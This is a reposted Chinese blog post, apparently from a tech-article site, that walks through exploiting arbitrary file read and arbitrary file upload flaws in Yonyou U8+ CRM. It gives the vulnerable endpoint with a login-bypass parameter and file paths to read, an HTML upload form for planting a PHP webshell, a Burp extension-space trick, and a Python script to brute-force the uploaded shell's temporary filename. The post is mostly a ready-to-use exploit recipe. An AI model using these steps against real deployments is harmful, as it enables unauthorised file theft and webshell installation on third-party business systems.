menu
  • 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

用友U8+ CRM任意文件上传、任意文件读取

武飞扬头像
神丶上单
帮助1

用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞

学新通

任意文件读取

存在漏洞的文件为:

/ajax/getemaildata.php

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt

可以看到用友版本7.2 patch2

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

可以看到C://windows/win.ini

学新通

任意文件上传

首先构造一个文件上传的页面

<html>

<form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data"> 

  <input type="file" name="file" /> 

  <input type="submit" name="upload" value="upload"/>

</form>

</html>

选择php一句话木马

学新通

打开burp进行抓包,在文件上传的后缀名处添加一个空格

学新通

返回的tmpfile\\mht3AC8.tmp.mht即为木马地址,访问http://IP:端口/tmpfile//mht3AC8.tmp.mht即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php,将前面的mht改为upd,将后面的mht改为php

学新通

抓包,将其放到爆破工具里,爆破中间的3AC8,范围是从0000~FFFF,共65536个

学新通

生成字典的脚本如下:

with open('1.txt', 'w') as f:
    for i in range(0x10000):
        f.write(format(i, '04X')   '\n')

该脚本会在当前目录下生成1.txt

学新通

成功访问到马

学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgfciei
系列文章
更多 icon
同类精品
更多 icon
继续加载
友情链接: 申请要求:权重≥3,IP≥1000,内容属同类网站; 申请邮件: luke.wu●vfv.cc 友情链接交换群: 友情链接交换群
外链价格: 【首页 30/月 - 300/年】【内页 50/月 - 500/年】【全站 70/月 - 700/年】 购买外链请加QQ群: 站长交流群